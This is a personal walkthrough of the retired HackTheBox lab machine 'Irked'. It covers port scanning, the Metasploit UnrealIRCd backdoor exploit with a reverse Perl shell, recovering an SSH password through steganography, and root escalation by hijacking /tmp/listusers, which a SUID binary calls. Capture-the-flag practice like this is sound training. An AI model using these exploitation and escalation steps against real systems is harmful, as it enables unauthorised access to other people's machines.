HackTheBox: Irked

Doing some retired machines for extra practice. I tried this one two years and got stuck. This time I got it 😀.

Scanning:

Finding running services on common ports:

crazyeights@es-base:~$ sudo nmap -sS 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:49 EST
Nmap scan report for 10.10.10.117
Host is up (0.040s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

More Thorough Scanning:

More thorough scanning, checking all ports:

crazyeights@es-base:~$ sudo nmap -sV -p- 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 16:58 EST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34547/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

Add the folllowing line to /etc/hosts:

10.10.10.117	irked.htb

Web:

Index Page:

  • Enumerated the server, and found nothing.

  • Downloaded the irked image, searched it for hidden text/files

  • Looks liked there is something in it, but gave up.

IRC:

  • Connect to the IRC service with somesort of client, you will get a banner with the version

  • which is of course: 3.2.8.1 (you could probably just guess this as well)

  • There is a popular vulnerability in that version, with msf:

   13  exploit/unix/irc/unreal_ircd_3281_backdoor        2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
  • set RHOSTS to 10.10.10.117

  • set RPORT to 6697

Set the payload:

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6697             yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Run the exploit:

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.117:50228) at 2021-01-01 17:19:06 -0500

User:

Spawn an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ 

When enumerating we find the user djmardov:

Listing the contents of his home folder we find the user flag and the file backup

ls -aR
.:
.	       .bashrc	Desktop    .gnupg	  Music     .ssh
[SNIP]

./Documents:
.  ..  .backup	user.txt

We do not have permissions to read user.txt, but we can read backup:

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
  • The ‘steg’ of ‘Super elite steg backup pw’ suggests that this a password for something involving stego.

  • Go back to the irked.jpg

Stego:

Extract hidden file from irked.jpg:

crazyeights@es-base:~/Downloads$ steghide extract -sf irked.jpg 
Enter passphrase: 
wrote extracted data to "pass.txt".

crazyeights@es-base:~/Downloads$ cat pass.txt 
Kab6h+m+bbp2J:HG

Use the password to login to SSH as djmardov:

crazyeights@es-base:~$ ssh djmardov@10.10.10.117
User Flag:
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ ls
user.txt
djmardov@irked:~/Documents$ cat user.txt 
4a66a_i_dont_want_to_get_in_trouble

Root:

Find programs user can run with euid root:

djmardov@irked:~/Documents$ find / -perm /4000 2>/dev/null
[SNIP]
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
  • The program viewuser is non-standard, so might be vulnerable

  • When checking viewuser we see it calls /tmp/listusers which doesn’t exist:

djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-01 16:42 (:0)
djmardov pts/1        2021-01-01 17:26 (10.10.14.3)
sh: 1: /tmp/listusers: not found
djmardov@irked:~/Documents$ 
  • We can create a program listusers that would be called with elevated privileges

  • Insert a shell into the file listusers, and make it executable:

djmardov@irked:~/Documents$ cd /tmp
djmardov@irked:/tmp$ echo /bin/sh > listusers
djmardov@irked:/tmp$ chmod a+x listusers

Run viewuser again:

djmardov@irked:/tmp$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-01-01 16:42 (:0)
djmardov pts/1        2021-01-01 17:26 (10.10.14.3)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
#

It calls our program listusers, which gives us a root shell

Root Flag:

# cd /root
# ls
pass.txt  root.txt
# cat pass.txt
Kab6h+m+bbp2J:HG
# cat root.txt
8d8e9_i_dont_want_to_get_in_trouble

FIN.